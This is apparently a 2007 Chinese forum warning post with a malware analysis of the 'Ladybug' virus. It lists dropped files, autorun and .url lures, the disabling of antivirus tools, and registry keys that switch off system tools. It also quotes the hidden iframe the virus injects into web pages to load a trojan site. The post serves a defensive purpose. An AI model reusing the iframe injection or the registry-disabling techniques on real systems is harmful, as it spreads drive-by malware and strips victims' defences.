广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 2175 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
[病毒蠕虫] 警惕小瓢虫病毒
警惕小瓢虫病毒
这个病毒看起来象熊猫烧香和AV终结者的结合体,阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些(现在病毒还不是真正意义上的感染,是用病毒体完全覆盖正常EXE),会不会造成和李俊版熊猫烧香一样的效果呢,完全有可能。

以下是关于该病毒的详细分析报告:

一.病毒信息

病毒名:Win32.Troj.Serwer.yx

病毒中文名称:小瓢虫

二.病毒行为:

这是一个感染型病毒,把会计算机上的系统时间改为 2030 年,在系统盘的system32文件夹下释放多个病毒文件。

在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件,以达到通过双击该盘时病毒可以运行起来.

在每个盘下生成三个Url文件,都指向该盘下的SDGame.exe文件,三个Url文件具有迷惑性的图标。可以查看这三个URL的属性,会发现都指向c:\sdgame.exe。

通过添加注册表启动项以达到开机时病毒能运行起来,通过修改注册表破坏系统安全模式,禁用大部分系统功能:包括,禁用任务管理器,禁用控制面板,禁止修改系统配置,锁定主页,禁用注册表编辑器等。

映像劫持了大量软件,被劫持的软件包括"杀毒软件","系统检测工具","QQ",(连QQ都不让用,这病毒够BT)
感染计算机上的 exe 文件,感染方式为覆盖数据. (除系统盘外,其它盘的EXE都被替换为小瓢虫图标)

感染计算机上的 hta,html,htm,jsp,php,asp 后缀的文件,插入网页代码. (除系统盘外,这一点和熊猫烧香的传播方式相同,有可能会造成网站大面积挂马)

把计算机上的所有盘设为所有人完全共享,(这是尼姆达病毒最常用的手段,当然,目的就是在局域网中大面积传播了。)

病毒运行后释放以下文件:
    %systemroot%\system32\Taskeep.vbs
    %systemroot%\system32\SDGames.exe
    %systemroot%\system32\Avpser.cmd
    %systemroot%\system32\netshare.cmd
    %systemroot%\system32\AUTORUN.INF

Taskeep.vbs 的作用是运行起病毒进程    

netshare.cmd 的作用是打开本机的共享  

Avpser.cmd 用于结束计算机上的大量杀毒软件、安全检测软件,常见杀毒软件都在被攻击之列。

病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf,并生成Recycleds.url,Windows.url,新建文件夹. url三个文件,诱使用户双击.这三个文件都指向该盘下的SDGame.exe文件.(Recycleds.url 的图标为"回收站",其余两个图标为"文件夹图标")

病毒创建注册表启动项,添加服务;

把计算机上为以下后缀名的文件插入代码: (除系统盘外)
    ".hta"
    ".html"
    ".htm"
    ".php"
    ".asp"
    ".jsp"
插入的代码:
  <iframe id="iframe" width="0" height="0" scrolling="no"frameborder="0" src="http://zhida...du.木马站/" name="Myframe"align="center" border="0">

感染计算机上的 exe 文件,感染方式为覆盖数据.(除系统盘,被感染后的 exe 文件图标为绿色的小飘虫)

修改计算机上的 reg 和 txt 文件关联指向 "%systemroot%\system32\SDGames.exe"

把计算机上的系统时间改为 2030 年,中国木马制作者的惯用手法。

通过修改注册表的方式破坏安全模式.

禁用cmd:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD

破坏显示隐藏文件:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
使得文件扩展名无法显示:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
隐藏控制面板:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
禁用注册表编辑器:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
禁用任务管理器:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
修改IE主页为: http:/ /www.zhidaobaidu.木马站
隐藏文件夹选项:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

映像劫持常用安全软件,这次连杀毒软件的命令行查毒都没放过



爸爸 你一路好走
献花 x0 回到顶端 [楼 主] From:台湾和信超媒体宽带网 | Posted:2007-12-27 03:21 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.055586 second(s),query:15 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言